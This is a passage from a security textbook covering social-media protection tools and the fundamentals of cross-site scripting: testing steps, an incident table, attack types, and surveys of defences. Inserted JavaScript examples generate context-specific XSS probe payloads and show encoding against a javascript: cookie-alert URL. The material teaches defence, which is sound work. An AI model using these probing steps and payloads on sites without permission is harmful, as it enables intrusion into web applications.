8. LogDog Security: It is a mobile intrusion detection system which prevents the user's data from being accessed illegally. It prevents unauthorized access by using the user's previous activity logs. Currently, it is developed for Android and iOS.

9. Minor Monitor: Online harassment of children is frequent on social media. Therefore, Minor Monitor is a service provided to parents so that they can examine the activities of their children on social media, such as their friends list and the content delivered to them by other users of the network.

10. Defensio: It helps in preventing spam messages and the installation of malware. It is a web service that also protects data from leakage.

11. NoScript Security Suite: It is a Firefox extension that allows executable scripts like JavaScript to be executed in the browser only from a trusted domain. It protects against XSS attacks and many more.

12. Privacy Badger: It is developed by the Electronic Frontier Foundation to protect against adware on social media. It also protects against cookie tracking done by advertisements on the social network without the consent of the social user. It executes as a browser extension.

13. uBlock Origin: It is an open-source, platform-independent browser extension that helps in filtering content as per the preferences of the user.

14. ZoneAlarm Anti-phishing Chrome Extension: It is a Chrome extension that protects social network users from phishing attacks and prevents the disclosure of sensitive information. It ensures safe surfing on the internet by notifying whether a site is safe or not.

15. ZoneAlarm Identity Protection: It is software that protects against identity theft. It maintains a credit score of the user as per the activity performed by the user, and if a deviation is found then it notifies the user.

16. Norton Safe Web: It is a service provided by Symantec, and it notifies the user about malicious links and sites.

17. McAfee Social Protection: It is a mobile application developed for Facebook users. It enables them to maintain the privacy of their posted photographs by restricting their viewing and download to the persons selected by the user.

18. Net Nanny: Software for monitoring the activities of children by their parents. It is used on Twitter, Facebook, and other platforms.

19. MyPermissions Social Media Privacy Protection: It provides complete privacy protection to the user by analyzing the information accessed by different applications, especially social networks. It generates alerts if some installed application tries to access sensitive information.

20. Privacy Scanner for Facebook: It is a scanner developed for Facebook users. It basically checks the user's privacy settings and informs the user if some risky settings are enabled that may harm the user's privacy.

2.5 CHAPTER SUMMARY

Thinking about social media means digital gathering with friends, family members, and working professionals and/or expanding social relations all around the globe. Social media has become an indispensable part of daily internet users' lives. It not only attracts billions of people because of its unique features and the services provided to the user, but is also an attractive target for most attackers and online fraudsters due to the information available on these platforms. Therefore, in this chapter, we have presented statistics related to the usage and popularity of social media and the recent attack incidences on it. We have briefly explained different classes of attacks on social media that are harmful to the social actors. Moreover, we have shown the trade-off between the design goals of the social network and the privacy and security of the user. Finally, we highlighted a variety of remedial solutions that are available to defend against these attacks but are less effective without the user's awareness.

REFERENCES

1. Al-Qurishi, M., Al-Rakhami, M., Alamri, A., Alrubaian, M., Rahman, S. M. M., & Hossain, M. S. (2017). Sybil defense techniques in online social networks: A survey. IEEE Access, 5, 1200–1219.
2. Almomani, A., Gupta, B. B., Wan, T. C., Altaher, A., & Manickam, S. (2013). Phishing dynamic evolving neural fuzzy framework for online detection zero-day phishing email. arXiv Preprint ArXiv:1302.0629.
3. Benenson, Z., Gassmann, F., & Landwirth, R. (2017, April). Unpacking spear phishing susceptibility. In International Conference on Financial Cryptography and Data Security (pp. 610–627). Springer, Cham.
4. Boulianne, S. (2019). Revolution in the making? Social media effects across the globe. Information, Communication and Society, 22(1), 39–54.
5. Cai, Z., He, Z., Guan, X., & Li, Y. (2016). Collective data-sanitization for preventing sensitive information inference attacks in social networks. IEEE Transactions on Dependable and Secure Computing, 15(4), 577–590.
6. Chaudhary, P., Gupta, B. B., & Gupta, S. (2016, March). Cross-site scripting (XSS) worms in Online Social Network (OSN): Taxonomy and defensive mechanisms. In 2016 3rd International Conference on Computing for Sustainable Global Development (INDIACom) (pp. 2131–2136). IEEE.
7. Ferrara, E., Varol, O., Davis, C., Menczer, F., & Flammini, A. (2016). The rise of social bots. Communications of the ACM, 59(7), 96–104.
8. Fire, M., Goldschmidt, R., & Elovici, Y. (2014). Online social networks: Threats and solutions. IEEE Communications Surveys and Tutorials, 16(4), 2019–2036.
9. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles, Algorithm, Applications, and Perspectives. CRC Press.
10. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the browser-side context-aware sanitization of suspicious HTML5 code for halting the DOM-based XSS vulnerabilities in cloud. International Journal of Cloud Applications and Computing, 7(1), 1–31.
11. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for Computer and Cyber Security: Principle, Algorithms, and Practices. CRC Press.
12. Gupta, S., & Gugulothu, N. (2018). Secure nosql for the social networking and e-commerce based bigdata applications deployed in cloud. International Journal of Cloud Applications and Computing, 8(2), 113–129.
13. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sanitizer. In Handbook of Research on Securing Cloud-Based Databases with Biometric Applications (pp. 174–191). IGI Global.
14. Gupta, S., & Gupta, B. B. (2015, May). PHP-sensor: A prototype method to discover workflow violation and XSS vulnerabilities in PHP web applications. In Proceedings of the 12th ACM International Conference on Computing Frontiers (p. 59). ACM.
15. Gupta, S., & Gupta, B. B. (2016). JS-SAN: Defense mechanism for HTML5-based web applications against JavaScript code injection vulnerabilities. Security and Communication Networks, 9(11), 1477–1495.
16. Isaac, Mike, & Frenkel, Sheera. Facebook security breach exposes accounts of 50 million users. [online] Available at: https://www.nytimes.com/2018/09/28/technology/facebook-hack-data-breach.html
17. Jain, A. K., & Gupta, B. B. (2017). Phishing detection: Analysis of visual similarity based approaches. Security and Communication Networks, 2017.
18. Jiang, F., Fu, Y., Gupta, B. B., Lou, F., Rho, S., Meng, F., & Tian, Z. (2018). Deep learning based multi-channel intelligent attack detection for data security. IEEE Transactions on Sustainable Computing.
19. Kamhoua, G. A., Pissinou, N., Iyengar, S. S., Beltran, J., Kamhoua, C., Hernandez, B. L., Njilla, L., & Makki, A. P. (2017, June). Preventing colluding identity clone attacks in online social networks. In 2017 IEEE 37th International Conference on Distributed Computing Systems Workshops (ICDCSW) (pp. 187–192). IEEE.
20. Li, C., Zhang, Z., & Zhang, L. (2018). A novel authorization scheme for multimedia social networks under cloud storage method by using MA-CP-ABE. International Journal of Cloud Applications and Computing, 8(3), 32–47.
21. Li, H., Chen, Q., Zhu, H., Ma, D., Wen, H., & Shen, X. S. (2017). Privacy leakage via de-anonymization and aggregation in heterogeneous social networks. IEEE Transactions on Dependable and Secure Computing.
22. Li, H., Zhu, H., Du, S., Liang, X., & Shen, X. S. (2016). Privacy leakage of location sharing in mobile social networks: Attacks and defense. IEEE Transactions on Dependable and Secure Computing, 15(4), 646–660.
23. Liu, J., Tao, Y., & Bai, Q. (2016, August). Towards exposing cyberstalkers in online social networks. In Pacific Rim International Conference on Artificial Intelligence (pp. 763–770). Springer, Cham.
24. Mocktoolah, A., & Khedo, K. K. (2015, December). Privacy challenges in proximity based social networking: Techniques & solutions. In 2015 International Conference on Computing, Communication and Security (ICCCS) (pp. 1–8). IEEE.
25. Olakanmi, O. O., & Dada, A. (2019). An efficient privacy-preserving approach for secure verifiable outsourced computing on untrusted platforms. International Journal of Cloud Applications and Computing, 9(2), 79–98.
26. Patel, P., Kannoorpatti, K., Shanmugam, B., Azam, S., & Yeo, K. C. (2017, January). A theoretical review of social media usage by cyber-criminals. In 2017 International Conference on Computer Communication and Informatics (ICCCI) (pp. 1–6). IEEE.
27. Pew Research Center. (2018). Social Media Use in 2018. [online] Available at: https://www.pewresearch.org/internet/2018/03/01/social-media-use-in-2018/.
28. Rathore, S., Sharma, P. K., Loia, V., Jeong, Y. S., & Park, J. H. (2017). Social network security: Issues, challenges, threats, and solutions. Information Sciences, 421, 43–69.
29. Sahoo, S. R., & Gupta, B. B. (2019). Classification of various attacks and their defence mechanism in online social networks: A survey. Enterprise Information Systems, 13(6), 832–864.
30. Social media active users. [online] Available at: https://www.statista.com/statistics/272014/global-social-networks-ranked-by-number-of-users/.
31. Squicciarini, A., Rajtmajer, S., Liu, Y., & Griffin, C. (2015, August). Identification and characterization of cyberbullying dynamics in an online social network. In Proceedings of the 2015 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining 2015 (pp. 280–285). ACM.
32. Tian, Y., Yuan, J., & Yu, S. (2016, October). SBPA: Social behavior based cross social network phishing attacks. In 2016 IEEE Conference on Communications and Network Security (CNS) (pp. 366–367). IEEE.
33. WhatsApp vulnerability. [online] Available at: https://www.helpnetsecurity.com/2019/05/14/whatsapp-flaw-spyware-cve-2019-3568/.
34. Xu, H., Sun, W., & Javaid, A. (2016, March). Efficient spam detection across online social networks. In 2016 IEEE International Conference on Big Data Analysis (ICBDA) (pp. 1–6). IEEE.
35. Yan, G., Chen, G., Eidenbenz, S., & Li, N. (2011, March). Malware propagation in online social networks: Nature, dynamics, and defense implications. In Proceedings of the 6th ACM Symposium on Information, Computer and Communications Security (pp. 196–206). ACM.
36. Zhang, Z., Sun, R., Zhao, C., Wang, J., Chang, C. K., & Gupta, B. B. (2017). CyVOD: A novel trinity multimedia social network scheme. Multimedia Tools and Applications, 76(18), 18513–18529.
CHAPTER 3

Fundamentals of Cross-Site Scripting (XSS) Attack

In this chapter, we present a comprehensive study of one of the most dangerous web application vulnerabilities, i.e. Cross-Site Scripting (XSS). This chapter focuses on what XSS is, what the different flavors of XSS attack are, how the attacker can exploit this vulnerability, and what the effects of the XSS attack are; lastly, we shed some light on the defensive techniques developed by researchers to defend against the XSS attack.

3.1 OVERVIEW OF CROSS-SITE SCRIPTING (XSS) ATTACK

XSS comes under the category of code injection attacks [4]. It is one of the most severe security vulnerabilities present in web applications. In this type of attack, the adversary injects judiciously crafted malicious JavaScript code through the input parameters at the client side. This is done in order to cause harmful actions by the web application and accomplish the attacker's objectives, like cookie stealing and session token theft, or to launch other attacks [8, 20]. The origin of the XSS attack is the inappropriate filtering of the input text entered at the client side, which makes it easy for an attacker to introduce mischievous code into OSN-based web pages. These malicious scripts run at the client side in the user's web browser.

3.1.1 Steps to Exploit XSS Vulnerability


XSS arises because of the security faws in the HTML, JavaScript,
fash, AJAX, etc. When malicious code comes from a trusted
source, it is executed in the same way as the legitimate JavaScript
code, so the attacker is able to access the sensitive information of
the victim. Here, we describe the steps to examine whether a web
site is XSS vulnerable or not.

Fundamentals of Cross-Site Scripting (XSS) Attack ◾ 55

Step 1: Initially, explore the input fields available in a web site,
for instance a search box, a comment box, or any form to be filled
by the user.

Step 2: Now, enter a distinctive string into the identified field and
submit it. Search for this string in the source code of the resulting
web page.

Step 3: Check whether the entered string is displayed on the web page
as the result of step 2. If it is displayed unmodified, the web site
may be vulnerable to XSS. If it is displayed with characters such as
<, >, and " converted to entities, or is not displayed at all, this
particular field is probably not exploitable, although other fields
of the same site may be. Try some different inputs in steps 2 and 3.

Step 4: Now enter a harmless test script, say
<script>alert("XSS");</script>, and submit it.

Step 5: If the web page does not employ any sanitization or output
encoding, the script will be executed in the browser. After its
successful execution, a dialog box will pop up, displaying XSS in
the message body of the box.

This indicates that the web site is exposed to XSS attack. By
extending the code, the attacker can steal the session token and
cookie information of the user (unless the cookie is marked HttpOnly,
in which case document.cookie does not expose it) and gain access to
the user's account to launch different types of attacks.
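The check in steps 2 and 3 is easy to get wrong by eye: a string that is echoed back with its metacharacters entity-encoded is not the same finding as one echoed raw, and the context the echo lands in decides which payload step 4 should use. The block below is an added example in JavaScript (Node), not code from the book; it works on response bodies that have already been fetched, so it runs offline. The canary string, the sample responses and the function names (classifyReflection, candidateFields, payloadFor) are constructed for the illustration.

```javascript
// Added example (not from the book): classify where a probe string lands
// in a server response. The canary carries the metacharacters an XSS
// payload needs, so an unmodified echo is a strong signal and an
// entity-encoded echo is a negative one.
const CANARY_CORE = 'xssprobe7a1c';          // alphanumeric core, survives encoding
const CANARY = `<"'${CANARY_CORE}>`;         // full probe with HTML metacharacters

// Is the text before the reflection inside an open <script> element?
function insideScript(prefix) {
  const lower = prefix.toLowerCase();
  const open = lower.lastIndexOf('<script');
  return open !== -1 && open > lower.lastIndexOf('</script');
}

// Is the text before the reflection inside an unclosed tag (attribute context)?
function insideTag(prefix) {
  return prefix.lastIndexOf('<') > prefix.lastIndexOf('>');
}

function contextOf(prefix) {
  if (insideScript(prefix)) return 'script';
  if (insideTag(prefix)) return 'attribute';
  return 'html';
}

// Classify one response body.
// Returns { reflected, encoded, context } with context one of
// 'html' (text node), 'attribute' (inside a tag), 'script', or 'none'.
function classifyReflection(body) {
  const raw = body.indexOf(CANARY);
  if (raw !== -1) {
    return { reflected: true, encoded: false, context: contextOf(body.slice(0, raw)) };
  }
  const core = body.indexOf(CANARY_CORE);
  if (core !== -1) {
    // The core survived but the metacharacters did not: the output was
    // encoded or filtered, so this field is most likely not exploitable as-is.
    return { reflected: true, encoded: true, context: contextOf(body.slice(0, core)) };
  }
  return { reflected: false, encoded: false, context: 'none' };
}

// Step 4 payload appropriate to the context found in step 3.
function payloadFor(context) {
  switch (context) {
    case 'html':      return '<script>alert("XSS")</script>';
    case 'attribute': return '"><script>alert("XSS")</script>';
    case 'script':    return '";alert("XSS");//';
    default:          return null;
  }
}

// Constructed sample responses, one per submitted field (not real traffic).
const SAMPLE_RESPONSES = {
  search:  `<h1>Results for: ${CANARY}</h1>`,                         // raw echo in HTML text
  comment: `<p>Your comment: &lt;&quot;&#x27;${CANARY_CORE}&gt;</p>`, // entity-encoded echo
  name:    `<input type="text" name="name" value="${CANARY}">`,       // raw echo inside a tag
  tracker: `<script>var q = "${CANARY}";</script>`,                   // raw echo inside script
  unused:  `<p>Nothing here</p>`,                                     // not reflected at all
};

// Names of the fields whose raw reflection warrants the step 4 test.
function candidateFields(responses) {
  return Object.entries(responses)
    .filter(([, body]) => {
      const r = classifyReflection(body);
      return r.reflected && !r.encoded;
    })
    .map(([name]) => name);
}
```

Against the constructed responses, only search, name and tracker come back as candidates; comment is reflected but encoded, which is exactly the case the book's step 3 would misreport as vulnerable. The context detection is deliberately simple (it scans backwards for the last tag delimiter) and will misjudge reflections inside HTML comments or CDATA, so treat its answer as a hint for which payload to try first, not as proof.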

3.1.2 Recent Incidents of XSS Attack

It is a problematic task to detect XSS attack because the browser's
behavior is unchanged by the attack: injected JavaScript runs exactly
like legitimate page script, so illicit JavaScript is hard to
distinguish from normal web content. Almost every large online
application has been hit by an XSS worm. Web sites such as Twitter,
Facebook, YouTube, and Drupal have been severely affected by XSS
attacks. Table 3.1 lists recent incidents of XSS attack, along with
their consequences [10, 12–14, 41].

TABLE 3.1 Recent Incidents of XSS Attack (web application, year: effects)

Evernote for Windows, 2018: Remote access to the victim's computer.
Trend Micro OfficeScan, 2017: Sensitive information disclosure.
Cisco Prime Infrastructure, 2017: Access to confidential browser-based information, which led to account hijacking.
Cisco ASA VPN Portal, 2016: An XSS flaw affected Cisco's VPN portal and consequently led to the theft of its users' credentials.
Drupal, 2016: Account hijacking.
eBay, 2016: Hackers used parasitic code in the login page to steal users' login details, i.e. account hijacking.
Square API, 2016: The attacker injected malicious code via login entries, which resulted in app takeover.
NASA, 2015: XSS attack vectors were detected in the NASA Scientific and Technical Information (STI) Order Form, which could be used to feed disinformation to users.
Facebook, 2015: An XSS bug in Facebook's content delivery network allowed hackers to take over Facebook users' accounts.
WordPress, 2015: Information disclosure.
PayPal, 2015: A stored XSS vulnerability in the e-payment service permitted the hacker to insert malicious code to launch various types of attacks.
eBay, 2014: Phishing.
UK Parliament Web Site, 2014: Disinformation.
RadEditor HTML Editor, 2014: Improper sanitization of user data resulted in theft of personal information and drive-by-download attacks.
Yahoo Mail, 2013: The hacker used a DOM-based XSS attack to hijack users' accounts.
Internet Explorer, 2013: The hacker bypassed the anti-XSS filter employed in IE 8 and higher by injecting malicious JavaScript into an attribute created by the attacker.
eBay, 2012: The attacker injected malicious code into product listings and fed disinformation to its users.
McAfee, 2012: An XSS vulnerability allowed attackers to launch drive-by-download attacks.
Hotmail, 2011: A security hole in Hotmail enabled attackers to steal users' cookies and take control of their sessions.
Amazon, 2010: An XSS vulnerability permitted the attacker to steal session IDs and take control of the user's account when the user clicked on a malicious link.
Facebook, 2010: An XSS bug allowed hackers to hijack users' accounts by posting malicious comments or posts.
Orkut, 2010: Malicious group formation.
YouTube, 2010: Drive-by-download.

3.2 EFFECTS OF XSS ATTACK

XSS not only enables attackers to get their hands on the sensitive
information of the user, but also enables them to trigger more advanced
attacks using the victim's machine. Table 3.2 highlights the effects or
impacts of an XSS attack on the user [3]. These effects can harm the
user catastrophically; therefore, web applications and software should
be developed and used with proper attention, keeping the XSS flaw in
mind.

TABLE 3.2 Effects of XSS Attack (impact: description)

Cookie Stealing: It is possible for an attacker to steal the cookie sent by the server containing the session ID, take control of the user's account, and perform malicious activities like sending spam messages to the user's friends.

Account Hijacking: The attackers can steal sensitive information like financial account credentials or bank account login details for their own benefit. If an account is hijacked, the attacker can perform every action that account is permitted to perform against the OSN server and database; if the hijacked account is an administrator's, this can amount to complete control over the OSN web application.

Misinformation: This is the threat of credentialed misinformation. It may include malware that tracks the user's traffic statistics, leading to loss of privacy. Moreover, the injected script may alter the content of the page, resulting in loss of integrity.

Denial of Service Attack [9, 34]: Data availability is an utmost important property of any enterprise service. An XSS attack can be used to redirect the user to some other fake web page whenever the user requests the legitimate page, so that he cannot reach the legitimate web site at all. The attacker thereby denies service to that user (a client-side denial of service, distinct from a DDoS against the server). Malicious scripts may also crash the user's browser or block the web application indefinitely through pop-ups.

Browser Exploitation: Malicious scripts may redirect the user's browser to the attacker's site so that the attacker can take full control of the user's computer, use it to install malicious programs like viruses and Trojan horses, and gain access to the user's sensitive information.

Remote Control on System: Once the XSS attack vector gets executed on the victim's machine, it opens a way for the attacker to inject different malware that helps in gaining remote access to the victim's system. Thereafter, the system may perform malicious activity on the internet or become part of a botnet used to launch different attacks.

Phishing [1, 19]: When the user clicks on a malicious link sent by the attacker, it may redirect the user to a fake web site designed by the attacker to capture sensitive information like the user's login credentials.

3.3 CLASSIFICATION OF XSS ATTACK

There are different ways to perform an XSS attack. It can be launched
in three different ways and, therefore, can be classified into three
categories [15]: persistent XSS attack, non-persistent XSS attack, and
DOM-based XSS attack.

3.3.1 Persistent XSS Attack

It is also known as stored XSS attack because the malicious script
permanently resides at the server end. In this attack, the attacker
permanently injects the maliciously crafted code into the server, for
example into a comment, profile field, or message that the application
stores and later renders to other users. After this, any user who
visits the web page containing the injected script gets infected by the
XSS attack. It is the most dangerous type of XSS attack because the
attacker injects the malicious code into the server just once, and it
then affects a large number of benign users of an application whose
sanitization mechanisms are improper. Figure 3.1 depicts the scenario of
a persistent XSS attack.

FIGURE 3.1 Persistent XSS attack.

3.3.2 Non-Persistent Attack

It is also known as reflected XSS attack because the malicious script
is reflected back in the server's response. In this attack, the
attacker crafts a malicious URL and sends it to the victim by email or
posts it in a fascinating message on social media. When the user clicks
on this link, a request carrying the script (typically in a query
parameter) is sent to the server. The script is never stored on the
server; the server simply echoes it back in its response, for instance
in a search result page or an error message. At the browser side this
script then gets executed and the user is affected by the XSS attack.
Figure 3.2 depicts the entire scenario of this attack.

FIGURE 3.2 Non-persistent XSS attack.

3.3.3 DOM-Based XSS Attack

A Document Object Model (DOM)-based XSS attack is a client-side XSS
attack. The DOM is the browser's in-memory representation of the web
page, which page scripts read and modify. In this attack the injected
payload need not appear in the server's response at all: legitimate
client-side JavaScript reads attacker-controlled data from a DOM source
such as document.location (including location.hash and
location.search), document.URL, or document.referrer, and writes it to
a DOM sink such as document.write(), innerHTML, or eval() without proper
filtering. The injected script thereby alters the structure of the DOM
and can leak sensitive information. This attack is less explored by
researchers because it is hard to detect and mitigate: the vulnerability
is not visible in the HTML returned by the server, so it requires a
careful analysis of the DOM tree and of the client-side code while the
page or the server's response is interpreted (Figure 3.3).

FIGURE 3.3 DOM-based XSS attack.

3.4 APPROACHES TO DEFEND AGAINST XSS ATTACK

Different security organizations have found that XSS is among the most
prevalent attacks in the history of internet security. It has reportedly
been discovered in almost 80 percent of web applications, including
popular applications such as those of MySpace, Cisco, NASA, Facebook,
and Twitter. Therefore, it has attracted the attention of many
researchers and security solution developers. Different solutions have
been designed depending on the type of XSS attack they deal with. We
have categorized these solutions or approaches into four categories
depending on the location of their implementation: client-side
approaches, server-side approaches, client-server (combinational)
approaches, and proxy-based approaches. We highlight only the major and
most effective approaches in the following subsections.
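Several of the approaches surveyed below (DjangoChecker [32], XSSDM [11], Chaudhary et al. [2]) check that sanitization is context sensitive. The block below is an added example of what that requirement means in practice; it is JavaScript as a Node or server-side template would use it, and it is not code from the book or from any of the surveyed tools. It contrasts a naive renderer that HTML-encodes every value with one that picks the encoder by output context, and shows the two contexts where HTML encoding alone fails: an href that receives a javascript: URL, and an event-handler attribute whose entities the HTML parser decodes before the JavaScript engine sees them. The profile fields, the greet() handler and the function names are hypothetical.

```javascript
// Added example (not from the book or any surveyed tool): one encoder per
// output context, and why HTML entity encoding everywhere is not enough.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// HTML text and quoted-attribute context.
function encodeForHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// JavaScript string-literal context: every character outside [A-Za-z0-9 ]
// becomes \uXXXX, so quotes, backslashes, </script> and line terminators
// can never terminate the literal.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// URL context (href/src): encoding cannot help here, the scheme must be
// validated. Only http(s) URLs and site-relative paths pass; javascript:,
// data:, vbscript: and protocol-relative //host URLs are replaced.
function safeUrl(s) {
  const u = String(s).trim();
  return /^(https?:\/\/|\/(?!\/))/i.test(u) ? u : 'about:blank';
}

// What the HTML parser hands to the JavaScript engine for an attribute
// value: entities are decoded BEFORE the handler source is evaluated.
function decodeAttributeEntities(attr) {
  return attr
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&quot;/g, '"').replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>').replace(/&amp;/g, '&');
}

// Naive rendering: HTML-encode everything, regardless of context.
function renderProfileNaive(p) {
  return `<a href="${encodeForHtml(p.site)}">${encodeForHtml(p.name)}</a>` +
         `<button onclick="greet('${encodeForHtml(p.nick)}')">Hi</button>`;
}

// Context-sensitive rendering: validate the URL; for the handler argument,
// JS-string-encode first (inner context), then HTML-encode (outer context).
function renderProfileSafe(p) {
  return `<a href="${encodeForHtml(safeUrl(p.site))}">${encodeForHtml(p.name)}</a>` +
         `<button onclick="greet('${encodeForHtml(encodeForJsString(p.nick))}')">Hi</button>`;
}

// The onclick source exactly as the browser would evaluate it.
function onclickSource(html) {
  const m = /onclick="([^"]*)"/.exec(html);
  return m ? decodeAttributeEntities(m[1]) : '';
}

// Constructed attacker-controlled profile (not real data).
const ATTACKER_PROFILE = {
  name: '<img src=x onerror=alert(1)>',
  site: 'javascript:alert(document.cookie)',
  nick: "');alert(1);//",
};
```

With the constructed profile, the naive renderer neutralizes the name but ships href="javascript:alert(document.cookie)" untouched and produces onclick="greet('&#x27;);alert(1);//')", which the browser decodes to greet('');alert(1);//') and executes. The safe renderer replaces the URL with about:blank and leaves the handler argument as a \u0027-escaped string literal that cannot break out. The general rule the example illustrates: nest encoders from the innermost context outwards, and validate rather than encode where the data becomes a URL.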
3.4.1 Client-Side Approaches

These are the approaches, add-ons, or browser extensions that work at
the client side, that is, they are implemented on the user's machine.
Table 3.3 presents some of the effective approaches.

TABLE 3.3 Client-Side Defensive Approaches against XSS Attack

MLPXSS [24]
Methodology: The authors propose a technique based on an ANN multilayer perceptron combined with dynamic extraction of features for XSS mitigation. It performs better than other machine-learning approaches.
Limitations: It is not tested on real-world web applications for detecting XSS attacks.

TT-XSS [39]
Methodology: The authors propose an approach based on dynamic analysis and taint tracking at the browser end to detect DOM-based XSS attacks. Vulnerabilities are detected by analyzing the flow of suspicious script code execution.
Limitations: It consumes more time to create attack vectors when payloads are complicated, and it cannot deal with second-order inputs.

Khan et al. [21]
Methodology: The authors design an approach that works as an interceptor between the client and the server and processes the web page to detect malicious code injection. It divides web pages into static and dynamic; dynamic pages are tested for vulnerability by injecting an attack payload, and if the payload is displayed on the page, the page is prone to XSS.
Limitations: It cannot detect DOM-based XSS attacks.

Wang et al. [37]
Methodology: Combines machine-learning classifiers with an improved n-gram approach to mitigate XSS attacks on social networking platforms.
Limitations: Training is challenging; if features and instances are not sufficient, it may not detect malicious pages.

Guo et al. [7]
Methodology: The authors build an optimized XSS attack vector repository that a detection tool can use to detect XSS attacks. Mutation rules are applied to an initially constructed XSS attack vector dataset to optimize it.
Limitations: It incurs performance overhead while creating the optimized repository.

ETSSDetector [29]
Methodology: Works by simulating the behavior of the browser. It interacts with the web page, identifies suspicious locations, and then tests their security by injecting a test payload; if the payload executes, the location is vulnerable to XSS.
Limitations: It is not capable of detecting DOM-based XSS attacks.

Vishnu et al. [36]
Methodology: The method is based on machine-learning classifiers. First a dataset is prepared by extracting and analyzing URL parameter values and JavaScript values; it is then used to train the classifiers to detect XSS attacks.
Limitations: The prepared dataset is not updated automatically, so new attack payloads may bypass it.

Wang et al. [38]
Methodology: A machine-learning approach that uses ADTree and AdaBoost classifiers to detect XSS attacks on social networking sites.
Limitations: It cannot handle DOM-based XSS attacks.

FlashOver [35]
Methodology: Designed to mitigate XSS attacks in Adobe Flash-based applications. It relies on static analysis to identify suspicious input fields and on dynamic analysis to test them; if the test payload executes, the field is vulnerable to XSS.
Limitations: Static analysis is effective only in detecting a limited set of XSS vulnerability sources, and the approach works only for malicious JavaScript code.

Lekies et al. [23]
Methodology: The authors present an approach that detects DOM-based XSS attacks using dynamic taint tracking and context-sensitive sanitization.
Limitations: It is not effective against stored XSS attacks.

3.4.2 Server-Side Approaches

These approaches execute at the server end and defend against XSS
attacks. Table 3.4 highlights some of the major server-side approaches.

TABLE 3.4 Server-Side Defensive Approaches against XSS Attack

Gupta et al. [16]
Methodology: The authors develop an approach that relies on finding mismatches between inserted values and already-known values. It extracts JS code and checks for any deviation from the already-known value at that location, which helps in detecting code injection vulnerabilities like XSS.
Limitations: Only the JavaScript context is taken into account, but XSS may also use other contexts such as URL parameters and style sheet features; the approach is ineffective against those attack vectors.

DjangoChecker [32]
Methodology: The authors design a dynamic taint analysis tool named DjangoChecker. It identifies whether the sanitizer primitives already applied in the web application are correct at their place: it determines the context of the attributes where they are applied and examines whether the sanitization implemented is correct for that context. In short, it checks whether sanitization is context sensitive.
Limitations: It is restricted to web applications developed with Django and is not able to detect DOM-based XSS attacks.

Lalia et al. [22]
Methodology: The authors propose detecting malicious script injection using script features. Script features are extracted and analyzed as to how they are used in crafting malicious scripts; the difference between suspicious and benign scripts is then used to detect XSS attacks.
Limitations: It is not effective against partial script injection and obfuscated script injection.

Moniruzzaman et al. [25]
Methodology: The authors design a technique that differentiates the actual content of a web page from injected data. It is developed only for banking web sites and is based on machine-learning methods; features of the DOM tree are extracted and used to train the model.
Limitations: It consumes more time because of feature extraction and because the web page is sent back to the server.

KameleonFuzz [6]
Methodology: A black-box detection technique that uses fuzz testing to automatically inject malicious payloads into the web application so as to trigger XSS vulnerabilities. It extends the LigRE model two steps further: first the generation of malicious input, and second taint analysis for vulnerability detection. It protects against stored and reflected XSS attacks.
Limitations: It requires resetting the application, which is not practical for live applications, and it requires human interpretation for attack vector generation.

XSSDM [11]
Methodology: The authors design an approach based on static analysis and pattern matching with context-sensitive sanitization to protect against XSS attacks.
Limitations: It requires the manual placement of sanitization code in the web page.

Dong et al. [5]
Methodology: Designed for webmail systems, with the capability to detect XSS attack vectors built from new HTML5 features. Attack vectors are injected at five injection points in the webmail system for testing, and it is then checked whether they are sanitized correctly.
Limitations: It focuses only on attack vectors related to the new HTML5 tags and attributes and does not take other suspicious contexts into account.

Ruse et al. [30]
Methodology: Designed for JSP-based web applications and based on concolic testing. It combines static analysis with runtime monitoring and identifies the relationships between input variables and output variables that pave the way for an attacker to initiate an XSS attack.
Limitations: It uses the jCUTE concolic testing tool, which fails to discover test cases in which output variables have a length of three characters or more.

3.4.3 Combinational Approaches

These approaches have modules that work on the client side as well as
on the server side. Table 3.5 presents the most promising approaches of
this category.

3.4.4 Proxy-Based Approaches

These approaches act as a proxy between the browser and the server to
defend against XSS attacks. Some of these approaches are highlighted in
Table 3.6.
TABLE 3.5 Combinational Defensive Approaches against XSS Attack

Gupta et al. [17]
Methodology: The authors propose a client-server approach that separates the JavaScript code into an external file and analyzes it at the client side. The context of each suspicious variable is determined, the JS is decoded, and the result is matched against the injected values in the request; a match may indicate an XSS attack.
Limitations: It cannot detect DOM-based XSS attacks, since matching is performed between request parameters and response parameters while DOM-based XSS is a purely client-side vulnerability.

Chaudhary et al. [2]
Methodology: The authors propose a context-sensitive sanitization technique. The context is determined statically at the server side and dynamically at the client side; sanitizer primitives are then applied according to the context of the vulnerable variable.
Limitations: It does not provide protection against untrusted script code loaded from an external source.

Panja et al. [27]
Methodology: The authors propose a technique named Buffer Based Cache Check to prevent and detect XSS attacks in mobile browsers. Using a cache avoids the overhead of supplying a script whitelist to the web page again and again: the server stores the verified scripts of the page from the last visit, and any deviation indicates suspicious activity such as XSS. This saves time.
Limitations: It requires client- and server-side code modification, which incurs performance overhead.

Gupta et al. [18]
Methodology: The authors propose an approach against DOM-based XSS attacks. Initially, the DOM tree is constructed under normal conditions, the scripting nodes are extracted, and a whitelist is prepared. The DOM tree of an untrusted web page is then constructed, the script code at the identified nodes is extracted and matched against the whitelist, and any mismatch indicates an XSS attack.
Limitations: It may hinder the execution of benign JavaScript code that does not match the whitelist.

Nadji et al. [26]
Methodology: A client-server architecture that enforces document structure integrity. It combines runtime tracking and randomization to thwart XSS attacks, enforcing the integrity constraint that malicious data must not alter the structure of the web application's document.
Limitations: It is not effective in detecting DOM-based XSS attacks and requires modification at both the client side and the server side.

TABLE 3.6 Proxy-Based Defensive Approaches against XSS Attack

DexterJS [28]
